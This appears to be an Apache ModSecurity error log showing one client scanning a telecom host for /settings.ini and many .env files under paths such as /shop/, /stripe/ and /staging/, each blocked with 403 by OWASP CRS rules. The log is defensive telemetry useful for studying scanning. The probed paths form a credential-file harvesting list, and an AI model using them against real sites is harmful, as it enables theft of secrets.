[Mon May 11 20:55:54.693980 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/settings.ini"] [unique_id "agImOlNddpkriGUb6ZV2sgAAARE"]
[Mon May 11 20:55:54.694170 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/settings.ini"] [unique_id "agImOlNddpkriGUb6ZV2sgAAARE"]
[Mon May 11 20:55:54.709272 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/server/backend/.env"] [unique_id "agImOpYn-x0CHsbEbP2tkwAAAIQ"]
[Mon May 11 20:55:54.709434 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/server/backend/.env"] [unique_id "agImOpYn-x0CHsbEbP2tkwAAAIQ"]
[Mon May 11 20:55:54.709624 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/server/backend/.env"] [unique_id "agImOpYn-x0CHsbEbP2tkwAAAIQ"]
[Mon May 11 20:55:54.832040 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /services/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/services/.env"] [unique_id "agImOjP5Q_-MBliRCAxnPgAAABM"]
[Mon May 11 20:55:54.832216 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/services/.env"] [unique_id "agImOjP5Q_-MBliRCAxnPgAAABM"]
[Mon May 11 20:55:54.832398 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/services/.env"] [unique_id "agImOjP5Q_-MBliRCAxnPgAAABM"]
[Mon May 11 20:55:54.836299 2026] [security2:error] [pid 1516058:tid 1516106] [client 195.178.110.199:34214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shop/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/shop/.env"] [unique_id "agImOiMeXtzav-mi9SyxfwAAANA"]
[Mon May 11 20:55:54.836458 2026] [security2:error] [pid 1516058:tid 1516106] [client 195.178.110.199:34214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/shop/.env"] [unique_id "agImOiMeXtzav-mi9SyxfwAAANA"]
[Mon May 11 20:55:54.836646 2026] [security2:error] [pid 1516058:tid 1516106] [client 195.178.110.199:34214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/shop/.env"] [unique_id "agImOiMeXtzav-mi9SyxfwAAANA"]
[Mon May 11 20:55:54.876253 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/src/.env"] [unique_id "agImOlNddpkriGUb6ZV2tAAAARE"]
[Mon May 11 20:55:54.876403 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/src/.env"] [unique_id "agImOlNddpkriGUb6ZV2tAAAARE"]
[Mon May 11 20:55:54.876591 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/src/.env"] [unique_id "agImOlNddpkriGUb6ZV2tAAAARE"]
[Mon May 11 20:55:54.956247 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/stage/.env"] [unique_id "agImOvjVc-A-CSptvm1xWAAAAEg"]
[Mon May 11 20:55:54.956408 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/stage/.env"] [unique_id "agImOvjVc-A-CSptvm1xWAAAAEg"]
[Mon May 11 20:55:54.956599 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/stage/.env"] [unique_id "agImOvjVc-A-CSptvm1xWAAAAEg"]
[Mon May 11 20:55:54.960399 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/staging/.env"] [unique_id "agImOjP5Q_-MBliRCAxnQgAAABI"]
[Mon May 11 20:55:54.960550 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/staging/.env"] [unique_id "agImOjP5Q_-MBliRCAxnQgAAABI"]
[Mon May 11 20:55:54.960732 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/staging/.env"] [unique_id "agImOjP5Q_-MBliRCAxnQgAAABI"]
[Mon May 11 20:55:55.107408 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /srv/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/srv/.env"] [unique_id "agImO5Yn-x0CHsbEbP2tmwAAAIQ"]
[Mon May 11 20:55:55.107563 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/srv/.env"] [unique_id "agImO5Yn-x0CHsbEbP2tmwAAAIQ"]
[Mon May 11 20:55:55.107741 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/srv/.env"] [unique_id "agImO5Yn-x0CHsbEbP2tmwAAAIQ"]
[Mon May 11 20:55:55.118011 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stripe/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/stripe/.env"] [unique_id "agImOzP5Q_-MBliRCAxnRgAAABI"]
[Mon May 11 20:55:55.118170 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/stripe/.env"] [unique_id "agImOzP5Q_-MBliRCAxnRgAAABI"]
[Mon May 11 20:55:55.118345 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/stripe/.env"] [unique_id "agImOzP5Q_-MBliRCAxnRgAAABI"]
[Mon May 11 20:55:55.129650 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/shared/.env"] [unique_id "agImO1NddpkriGUb6ZV2ugAAARE"]
[Mon May 11 20:55:55.129806 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/shared/.env"] [unique_id "agImO1NddpkriGUb6ZV2ugAAARE"]
[Mon May 11 20:55:55.129989 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/shared/.env"] [unique_id "agImO1NddpkriGUb6ZV2ugAAARE"]
[Mon May 11 20:55:55.136510 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /service/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/service/.env"] [unique_id "agImO1NddpkriGUb6ZV2uwAAAQw"]
[Mon May 11 20:55:55.136673 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/service/.env"] [unique_id "agImO1NddpkriGUb6ZV2uwAAAQw"]
[Mon May 11 20:55:55.136880 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/service/.env"] [unique_id "agImO1NddpkriGUb6ZV2uwAAAQw"]
[Mon May 11 20:55:55.190390 2026] [security2:error] [pid 1511173:tid 1511187] [client 195.178.110.199:34258] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stg/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/stg/.env"] [unique_id "agImO_jVc-A-CSptvm1xWQAAAEs"]
[Mon May 11 20:55:55.190556 2026] [security2:error] [pid 1511173:tid 1511187] [client 195.178.110.199:34258] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/stg/.env"] [unique_id "agImO_jVc-A-CSptvm1xWQAAAEs"]
[Mon May 11 20:55:55.190743 2026] [security2:error] [pid 1511173:tid 1511187] [client 195.178.110.199:34258] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/stg/.env"] [unique_id "agImO_jVc-A-CSptvm1xWQAAAEs"]
[Mon May 11 20:55:55.223919 2026] [proxy_fcgi:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] AH01071: Got error 'Primary script unknown'
[Mon May 11 20:55:55.285194 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/v1/.env"] [unique_id "agImO_jVc-A-CSptvm1xWwAAAEg"]
[Mon May 11 20:55:55.285401 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/v1/.env"] [unique_id "agImO_jVc-A-CSptvm1xWwAAAEg"]
[Mon May 11 20:55:55.285609 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/v1/.env"] [unique_id "agImO_jVc-A-CSptvm1xWwAAAEg"]
[Mon May 11 20:55:55.408283 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/test/.env"] [unique_id "agImOzP5Q_-MBliRCAxnTgAAAAo"]
[Mon May 11 20:55:55.408475 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/test/.env"] [unique_id "agImOzP5Q_-MBliRCAxnTgAAAAo"]
